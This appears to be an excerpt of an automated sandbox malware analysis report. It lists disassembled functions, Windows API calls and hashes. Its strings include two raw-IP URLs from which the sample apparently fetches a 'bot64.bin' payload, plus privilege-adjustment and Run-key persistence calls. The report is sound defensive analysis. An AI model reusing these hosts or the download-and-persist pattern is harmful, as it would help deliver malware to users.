                                                                                                                                                                                                                                                    • Opcode ID: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction ID: 6275dcd761034309eb084eecfd0c5d15d3bd67f068747cb091f911dfdd8ba6e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2701E576618A808AD790EF14F84471AB7A4F788794F901235EB9D43BA8DFBDC144CB50
                                                                                                                                                                                                                                                    Function 00007FF7F2D049BF Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCloseFreeHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2328737614-0
                                                                                                                                                                                                                                                    • Opcode ID: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction ID: 1ab782a464639ecf31336a66bb6dc7f0b1f11a3e8b18a126529f55d7be0ab478
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313B26608B8082DB64DB5AF49436EF3A0FBC8B91F504136EE9D837A8DE7CD045CB50
                                                                                                                                                                                                                                                    Function 00007FF7F2D02ED0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetOpenW.WININET ref: 00007FF7F2D01C64
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: Sleep.KERNEL32 ref: 00007FF7F2D01C7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetOpenUrlW.WININET ref: 00007FF7F2D01CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetOpenUrlW.WININET ref: 00007FF7F2D01CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01CF7
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: Sleep.KERNEL32 ref: 00007FF7F2D01D02
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: HttpQueryInfoA.WININET ref: 00007FF7F2D01D32
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01D41
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01D4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: Sleep.KERNEL32 ref: 00007FF7F2D01D57
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01D71
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetOpenUrlW.WININET ref: 00007FF7F2D01D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01DB3
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: Sleep.KERNEL32 ref: 00007FF7F2D01DBE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: HttpQueryInfoA.WININET ref: 00007FF7F2D01DF6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: GetProcessHeap.KERNEL32 ref: 00007FF7F2D01E05
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: HeapAlloc.KERNEL32 ref: 00007FF7F2D01E1B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D01C20: InternetCloseHandle.WININET ref: 00007FF7F2D01E33
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: GetCurrentProcess.KERNEL32 ref: 00007FF7F2D0404F
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: OpenProcessToken.ADVAPI32 ref: 00007FF7F2D04062
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F2D0408A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F2D040B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: CloseHandle.KERNEL32 ref: 00007FF7F2D040C0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: OpenProcess.KERNEL32 ref: 00007FF7F2D040D5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7F2D03FE8: CloseHandle.KERNEL32 ref: 00007FF7F2D0414D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00007FF7F2D02F3C
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32 ref: 00007FF7F2D02F4C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$Open$Process$HeapSleep$HttpInfoQueryToken$AdjustAllocCurrentFreeLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: http://176.111.174.140/bin/bot64.bin$http://176.111.174.177/bin/bot64.bin
                                                                                                                                                                                                                                                    • API String ID: 482118104-517461732
                                                                                                                                                                                                                                                    • Opcode ID: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction ID: 865aff09cbc0bd36d506fba03094e6245e0144d555e0855dc7f981bf6a9132bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA012820A18A4381F750FB65E8543A5A7A0EB88794FD44035E8AD8B2FDCEBCE145C7F1
                                                                                                                                                                                                                                                    Function 00007FF7F2D038B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1939809552.00007FF7F2D01000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7F2D00000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939751782.00007FF7F2D00000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939840822.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1939975734.00007FF7F2D07000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.1940281495.00007FF7F2D08000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ff7f2d00000_msiexec.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenValue
                                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                                    • API String ID: 3130442925-1428018034
                                                                                                                                                                                                                                                    • Opcode ID: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction ID: 69d170b35ca201335dfcda39f74fe29bab85ffc27d2f4d2598d9cd34ef7f1d54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3811F17652878186D790DB25F44466AB7A0FB847A0F905331F9BE43BE8DFACD184CB60

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:7.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:33
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                                                                                    execution_graph 15123 137d300 DuplicateHandle 15124 137d396 15123->15124 15125 137ad38 15128 137ae30 15125->15128 15126 137ad47 15129 137ae64 15128->15129 15130 137ae41 15128->15130 15129->15126 15130->15129 15131 137b068 GetModuleHandleW 15130->15131 15132 137b095 15131->15132 15132->15126 15133 137d0b8 15134 137d0fe GetCurrentProcess 15133->15134 15136 137d150 GetCurrentThread 15134->15136 15137 137d149 15134->15137 15138 137d186 15136->15138 15139 137d18d GetCurrentProcess 15136->15139 15137->15136 15138->15139 15142 137d1c3 15139->15142 15140 137d1eb GetCurrentThreadId 15141 137d21c 15140->15141 15142->15140 15143 1374668 15144 1374684 15143->15144 15145 1374696 15144->15145 15147 13747a0 15144->15147 15148 13747c5 15147->15148 15152 13748a1 15148->15152 15156 13748b0 15148->15156 15153 13748b0 15152->15153 15154 13749b4 15153->15154 15160 1374248 15153->15160 15158 13748d7 15156->15158 15157 13749b4 15157->15157 15158->15157 15159 1374248 CreateActCtxA 15158->15159 15159->15157 15161 1375940 CreateActCtxA 15160->15161 15163 1375a03 15161->15163

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 0137D0A8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 294 137d0a8-137d147 GetCurrentProcess 298 137d150-137d184 GetCurrentThread 294->298 299 137d149-137d14f 294->299 300 137d186-137d18c 298->300 301 137d18d-137d1c1 GetCurrentProcess 298->301 299->298 300->301 303 137d1c3-137d1c9 301->303 304 137d1ca-137d1e5 call 137d289 301->304 303->304 307 137d1eb-137d21a GetCurrentThreadId 304->307 308 137d223-137d285 307->308 309 137d21c-137d222 307->309 309->308
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0137D136
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0137D173
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0137D1B0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0137D209
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: 3876e107e46b1c447c9e57ae17a0a2b935afcc0c631be0441313bda711d99e0e
                                                                                                                                                                                                                                                    • Instruction ID: 96091d2da4a315fa409a7d2c52f872735f6eb7351162bfff2e03089a838f6bc3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3876e107e46b1c447c9e57ae17a0a2b935afcc0c631be0441313bda711d99e0e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F75177B4900349CFDB54CFA9D948BAEBFF1EF48314F24845AE019A73A0DB385944CB65
                                                                                                                                                                                                                                                    Function 0137D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 316 137d0b8-137d147 GetCurrentProcess 320 137d150-137d184 GetCurrentThread 316->320 321 137d149-137d14f 316->321 322 137d186-137d18c 320->322 323 137d18d-137d1c1 GetCurrentProcess 320->323 321->320 322->323 325 137d1c3-137d1c9 323->325 326 137d1ca-137d1e5 call 137d289 323->326 325->326 329 137d1eb-137d21a GetCurrentThreadId 326->329 330 137d223-137d285 329->330 331 137d21c-137d222 329->331 331->330
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0137D136
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0137D173
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0137D1B0
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0137D209
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: 46b5914ce3ea159b958365097ade5f01451a806bf1fa6f827edf7ee21c2583ec
                                                                                                                                                                                                                                                    • Instruction ID: b419def7b439f6c8664c4ba7196e8ddfd499f4a32ad684663edcad3a20636192
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46b5914ce3ea159b958365097ade5f01451a806bf1fa6f827edf7ee21c2583ec
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E25156B4900309CFDB54CFAAD948B9EBFF5EF48314F24845AE019A73A0DB385944CB65
                                                                                                                                                                                                                                                    Function 0137AE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 360 137ae30-137ae3f 361 137ae41-137ae4e call 1379838 360->361 362 137ae6b-137ae6f 360->362 367 137ae64 361->367 368 137ae50 361->368 364 137ae83-137aec4 362->364 365 137ae71-137ae7b 362->365 371 137aec6-137aece 364->371 372 137aed1-137aedf 364->372 365->364 367->362 418 137ae56 call 137b0b8 368->418 419 137ae56 call 137b0c8 368->419 371->372 373 137af03-137af05 372->373 374 137aee1-137aee6 372->374 379 137af08-137af0f 373->379 376 137aef1 374->376 377 137aee8-137aeef call 137a814 374->377 375 137ae5c-137ae5e 375->367 378 137afa0-137afb7 375->378 381 137aef3-137af01 376->381 377->381 391 137afb9-137b018 378->391 382 137af11-137af19 379->382 383 137af1c-137af23 379->383 381->379 382->383 385 137af25-137af2d 383->385 386 137af30-137af39 call 137a824 383->386 385->386 392 137af46-137af4b 386->392 393 137af3b-137af43 386->393 411 137b01a-137b060 391->411 394 137af4d-137af54 392->394 395 137af69-137af76 392->395 393->392 394->395 396 137af56-137af66 call 137a834 call 137a844 394->396 402 137af99-137af9f 395->402 403 137af78-137af96 395->403 396->395 403->402 413 137b062-137b065 411->413 414 137b068-137b093 GetModuleHandleW 411->414 413->414 415 137b095-137b09b 414->415 416 137b09c-137b0b0 414->416 415->416 418->375 419->375
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B086
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: 1a246d964ed1bf51d17e77d177e1976b2afc11d417a6e95e5899e99c7d6943fa
                                                                                                                                                                                                                                                    • Instruction ID: d39e4394ef2462d4eab4cbf2ccee494812fec89cf968808f01d5c2daec9023d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a246d964ed1bf51d17e77d177e1976b2afc11d417a6e95e5899e99c7d6943fa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 697144B0A00B058FDB24DF29D44575ABBF1FF88308F04892DE18AD7A50DB79E949CB91
                                                                                                                                                                                                                                                    Function 01374248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 420 1374248-1375a01 CreateActCtxA 423 1375a03-1375a09 420->423 424 1375a0a-1375a64 420->424 423->424 431 1375a66-1375a69 424->431 432 1375a73-1375a77 424->432 431->432 433 1375a79-1375a85 432->433 434 1375a88 432->434 433->434 436 1375a89 434->436 436->436
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013759F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                                                                                    • Opcode ID: f0a0b29c432c6ee45e2a1f45ca90b6ae049edbc4c9e73ab454b1627dfa94255d
                                                                                                                                                                                                                                                    • Instruction ID: 60c91cd10bbd85b8f0b1f3c31591225b4d8704267145f64972de404e18c42451
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0a0b29c432c6ee45e2a1f45ca90b6ae049edbc4c9e73ab454b1627dfa94255d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B41DFB0C0071DCBDB25DFA9C984B9EBBB5FF49314F20806AD408AB255DB756945CF90
                                                                                                                                                                                                                                                    Function 01375935 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 437 1375935-137593c 438 1375944-1375a01 CreateActCtxA 437->438 440 1375a03-1375a09 438->440 441 1375a0a-1375a64 438->441 440->441 448 1375a66-1375a69 441->448 449 1375a73-1375a77 441->449 448->449 450 1375a79-1375a85 449->450 451 1375a88 449->451 450->451 453 1375a89 451->453 453->453
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013759F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                                                                                    • Opcode ID: d42a6c2831e9b38bc736f3845f0a6a3c5c909a26155262da42b80c50dbe5485c
                                                                                                                                                                                                                                                    • Instruction ID: ced6ad95b39a7a50d65ede8aec89560c07aa91db8df3e2cda877eb98320a090c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d42a6c2831e9b38bc736f3845f0a6a3c5c909a26155262da42b80c50dbe5485c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C941EEB0D00719CADB25DFA9C984B8EBBB5FF48314F24806AD408AB255DB756945CF90
                                                                                                                                                                                                                                                    Function 0137D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 454 137d300-137d394 DuplicateHandle 455 137d396-137d39c 454->455 456 137d39d-137d3ba 454->456 455->456
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D387
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: d9f50690c9fee286a010e1998d8982202e3618b65be1d6809494774a732b26a5
                                                                                                                                                                                                                                                    • Instruction ID: eb30ecd0f7b8757a44057770900a74e651769fb4b805366c09d0ea43eda67ace
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9f50690c9fee286a010e1998d8982202e3618b65be1d6809494774a732b26a5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21E4B5D002089FDB10CF9AD984ADEBFF8EF48324F14841AE918A3310D378A944CFA0
                                                                                                                                                                                                                                                    Function 0137D2F9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 459 137d2f9-137d394 DuplicateHandle 460 137d396-137d39c 459->460 461 137d39d-137d3ba 459->461 460->461
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D387
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                    • Opcode ID: 3e03355db2a6c7f23a8f22367d6842ba2ce439211a09b1155c450ea6fbeafdd6
                                                                                                                                                                                                                                                    • Instruction ID: 9dc1bae52e60d7f6b3766e3ea5c2d6ef24961a34426a5809842c1b1860d52b43
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e03355db2a6c7f23a8f22367d6842ba2ce439211a09b1155c450ea6fbeafdd6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3021E4B5D002499FDB10CFA9D585AEEBFF5EF48324F14841AE958A3310C378A944DF64
                                                                                                                                                                                                                                                    Function 0137B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 464 137b020-137b060 465 137b062-137b065 464->465 466 137b068-137b093 GetModuleHandleW 464->466 465->466 467 137b095-137b09b 466->467 468 137b09c-137b0b0 466->468 467->468
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B086
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2163118696.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_1370000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: 49286c29673b24bd747e8e09928cf198362a72cb1d481181c28f6e5e815e1794
                                                                                                                                                                                                                                                    • Instruction ID: 41ae8d64fe3566d224eb8fe8ebf8fb0c294e5583deab3f072d0f53bb70472c8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49286c29673b24bd747e8e09928cf198362a72cb1d481181c28f6e5e815e1794
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911DFB5C007498FDB20CF9AD444B9EFBF4AB88324F14841AD569A7610D379A545CFA1
                                                                                                                                                                                                                                                    Function 00FFD110 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2161938909.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ffd000_4A64.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 329dd6f25341584bff1c0a3ca26dffb967ef6b7e9b3ca0918d5150869e620845
                                                                                                                                                                                                                                                    • Instruction ID: 2b9882f160007dcb317a1a94bdb3d77e75d0652ff9c00085651ab331c5293fa3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 329dd6f25341584bff1c0a3ca26dffb967ef6b7e9b3ca0918d5150869e620845
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8210672504208DFEB15DF14D9C0B26BF67FF94324F248569EA090B266C336D856E6A1
